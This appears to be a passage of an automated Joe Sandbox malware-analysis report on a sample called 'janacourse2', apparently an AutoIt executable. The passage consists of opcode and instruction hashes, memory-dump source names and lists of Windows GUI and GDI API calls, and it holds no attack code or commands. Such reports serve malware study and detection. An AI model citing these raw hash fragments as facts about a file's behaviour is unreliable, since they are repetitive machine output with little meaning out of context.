                                                                                                            • Instruction ID: 84d44c8f69f79af992799ea23862d20a89d282e4049f3d1d8703eb6541053119
                                                                                                            • Opcode Fuzzy Hash: d58340813ae995f8a32acd47bbeb83919726482b623e3881532716577c3c5885
                                                                                                            • Instruction Fuzzy Hash: 54325732D29F818DD733A535D8223366249AFB73D5F25C737F81AB5999EB2AC4835200
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad410da5bd3bebb3234123215b208b11da836efd24136b42fd274ebdc860aaab
                                                                                                            • Instruction ID: c4fd43e1b6d05baba6e642a8de4521efb0ef5f332cb99a5371ba0aea5db6d792
                                                                                                            • Opcode Fuzzy Hash: ad410da5bd3bebb3234123215b208b11da836efd24136b42fd274ebdc860aaab
                                                                                                            • Instruction Fuzzy Hash: 7A32F731A001868BFF26CE2CC695BBD7BE1EB45314F1882EAD6C9DB2D1D6349D81E741
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6fa55748ec5b329629840c1683657ccabb150d7d07b934c4c64d4575a5f63577
                                                                                                            • Instruction ID: df34b0cdba744a7d7980f9d2c8b78e4afcc2f3e3c0daebb4dc7293aed475540e
                                                                                                            • Opcode Fuzzy Hash: 6fa55748ec5b329629840c1683657ccabb150d7d07b934c4c64d4575a5f63577
                                                                                                            • Instruction Fuzzy Hash: 7622C171E0460A9FDF14DF65C881BEEB3B6FF44710F148129E912AB2A1EB399914EF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f0abedb5acb3853f14ec1c1fd5018e40a9648f887deb751583f76a2638888818
                                                                                                            • Instruction ID: 77d9a11414bd6c51d7a4c9e15a8aac8d9bbe17563f6b274e49b822eb791f04cd
                                                                                                            • Opcode Fuzzy Hash: f0abedb5acb3853f14ec1c1fd5018e40a9648f887deb751583f76a2638888818
                                                                                                            • Instruction Fuzzy Hash: 3002E6B1E0020AEBDB14DF54D881BADB7B5FF44300F108169E9069B3A0EB35AE14EF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f23fc04bdfdf04037809f78004f8876fb01129860b7ad7afff9a00b8affd420b
                                                                                                            • Instruction ID: dd070c1c981e252c5383d5eaf9418582bad1fd3ec475cee9c72a62292b6abacb
                                                                                                            • Opcode Fuzzy Hash: f23fc04bdfdf04037809f78004f8876fb01129860b7ad7afff9a00b8affd420b
                                                                                                            • Instruction Fuzzy Hash: 50B1DD30E2AF404DD72396398821337B65CBFBB6D5B91D71BFC6678E16EB2685834240
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                            • Instruction ID: de327eba4b9be7bbf82fb6790c97d8beb057792f55ff090eed8c67f93381cb6f
                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                            • Instruction Fuzzy Hash: DA915873A080A359DB294639857417EFFE36A923B131E079FD4F2CB2C5EE149554F620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                            • Instruction ID: 5ade836d50f2ba1a2e2700176c81c1f7ff226f23d3ed3932f0be03e06c472548
                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                            • Instruction Fuzzy Hash: 6D9143736090A35ADB2D427A857407EFFE26A923B131E079FD4F2CA2C5FD249564F620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 27a0e8338f4ae30d394ae593967e9a9e0a899335f3f4358955dadde2426327ec
                                                                                                            • Instruction ID: 0044475403c1d031b7f600f15e44cabb12c3c20a0073e958e124c2a47b8735d7
                                                                                                            • Opcode Fuzzy Hash: 27a0e8338f4ae30d394ae593967e9a9e0a899335f3f4358955dadde2426327ec
                                                                                                            • Instruction Fuzzy Hash: 18617932A0870956DA34BA288C96BBE3397DF81760F1C091BE843DF395F6199E43B355
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6881065cb1fca9e28be1ecf94750afcc7befb2ccbb9d147fc015b3291199af01
                                                                                                            • Instruction ID: 5d0f5e1b21c5b005b7c5d6aa0435673f2387f18bca79bd88d46a8749373196d3
                                                                                                            • Opcode Fuzzy Hash: 6881065cb1fca9e28be1ecf94750afcc7befb2ccbb9d147fc015b3291199af01
                                                                                                            • Instruction Fuzzy Hash: 71617932E0870956DA387A288C52BBF73979F42764F1C095BE843DF381FA16ED42B255
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction ID: b8c7e90210c7dae8e70810bc4190ebfa1ec5295057d372db13c03a4ad69e6ed5
                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction Fuzzy Hash: 7A815673A090A319EB698279853443EFFE37A923B131E079FD4F2CA2D1ED248554F620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                            • Instruction ID: 6479faa0c251caf28b08d3415b81488515649f97ddb93e0858212ec00e1f7693
                                                                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                            • Instruction Fuzzy Hash: 4441D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 008bf39707338cc9d983f86ebc8232bde26f408400f51856fa11cfb2ac2a7b53
                                                                                                            • Instruction ID: ece4be69f79a78f07b7dc9b32499637644add3f7ba539005fa8f4667404510ca
                                                                                                            • Opcode Fuzzy Hash: 008bf39707338cc9d983f86ebc8232bde26f408400f51856fa11cfb2ac2a7b53
                                                                                                            • Instruction Fuzzy Hash: 4421B7326206118BD728CEB9C86267E73E5A754314F25866EE4E7C77C5DE3AA904CB80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                            • Instruction ID: 4cd2489ea8259c8ebc200c616cb358b6ba4588c70333e4422590945d1229a75f
                                                                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                            • Instruction Fuzzy Hash: 6A018078A01209EFCB44DF98C5A09AEF7B5FF48310F60859AE819A7315D731AE42DF80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                            • Instruction ID: 2b1319278f11498aa35c2f69db7a2bbef23c2c0f253fdf210f47aa911e9b5924
                                                                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                            • Instruction Fuzzy Hash: 1601A478A00109EFCB44DF98C5909AEF7F5FF48310F20859AD909A7711D730AE42DB80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1653083565.00000000014D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 014D8000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_14d8000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 01032B30
                                                                                                            • DeleteObject.GDI32(00000000), ref: 01032B43
                                                                                                            • DestroyWindow.USER32 ref: 01032B52
                                                                                                            • GetDesktopWindow.USER32 ref: 01032B6D
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01032B74
                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01032CA3
                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01032CB1
                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032CF8
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 01032D04
                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01032D40
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D62
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D75
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D80
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 01032D89
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032D98
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 01032DA1
                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032DA8
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01032DB3
                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032DC5
                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0104FC38,00000000), ref: 01032DDB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01032DEB
                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 01032E11
                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 01032E30
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01032E52
                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103303F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                            • Opcode ID: aefec44401f60c49a5288460d31846f3012a051cabca043dd429e7b944057986
                                                                                                            • Instruction ID: b5d479a259b64884447a2c3a9223abab54f08cd9c661ff2c3e86b238aedc940a
                                                                                                            • Opcode Fuzzy Hash: aefec44401f60c49a5288460d31846f3012a051cabca043dd429e7b944057986
                                                                                                            • Instruction Fuzzy Hash: C6027EB5500204AFEB24DFA5CE89EAE7BB9FF49310F048158F955AB294C779AD01CF60
                                                                                                            APIs
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0104712F
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 01047160
                                                                                                            • GetSysColor.USER32(0000000F), ref: 0104716C
                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 01047186
                                                                                                            • SelectObject.GDI32(?,?), ref: 01047195
                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 010471C0
                                                                                                            • GetSysColor.USER32(00000010), ref: 010471C8
                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 010471CF
                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 010471DE
                                                                                                            • DeleteObject.GDI32(00000000), ref: 010471E5
                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 01047230
                                                                                                            • FillRect.USER32(?,?,?), ref: 01047262
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01047284
                                                                                                              • Part of subcall function 010473E8: GetSysColor.USER32(00000012), ref: 01047421
                                                                                                              • Part of subcall function 010473E8: SetTextColor.GDI32(?,?), ref: 01047425
                                                                                                              • Part of subcall function 010473E8: GetSysColorBrush.USER32(0000000F), ref: 0104743B
                                                                                                              • Part of subcall function 010473E8: GetSysColor.USER32(0000000F), ref: 01047446
                                                                                                              • Part of subcall function 010473E8: GetSysColor.USER32(00000011), ref: 01047463
                                                                                                              • Part of subcall function 010473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01047471
                                                                                                              • Part of subcall function 010473E8: SelectObject.GDI32(?,00000000), ref: 01047482
                                                                                                              • Part of subcall function 010473E8: SetBkColor.GDI32(?,00000000), ref: 0104748B
                                                                                                              • Part of subcall function 010473E8: SelectObject.GDI32(?,?), ref: 01047498
                                                                                                              • Part of subcall function 010473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 010474B7
                                                                                                              • Part of subcall function 010473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010474CE
                                                                                                              • Part of subcall function 010473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 010474DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124339563-0
                                                                                                            • Opcode ID: 0862b8d68bf1b25512f47ba4447c666b5ae72dffdbf4342411fe465fc187a5a6
                                                                                                            • Instruction ID: b28da65a062b6ad63ea76a2bd0bd16e51b913d0469267597c7c5ca89f9f9c0d7
                                                                                                            • Opcode Fuzzy Hash: 0862b8d68bf1b25512f47ba4447c666b5ae72dffdbf4342411fe465fc187a5a6
                                                                                                            • Instruction Fuzzy Hash: C8A1B2B6009301BFE7219F64DE88A5F7BE9FB49320F100A29FAE2961E0D735D444CB91
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?), ref: 00FC8E14
                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 01006AC5
                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 01006AFE
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01006F43
                                                                                                              • Part of subcall function 00FC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC8BE8,?,00000000,?,?,?,?,00FC8BBA,00000000,?), ref: 00FC8FC5
                                                                                                            • SendMessageW.USER32(?,00001053), ref: 01006F7F
                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 01006F96
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 01006FAC
                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 01006FB7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
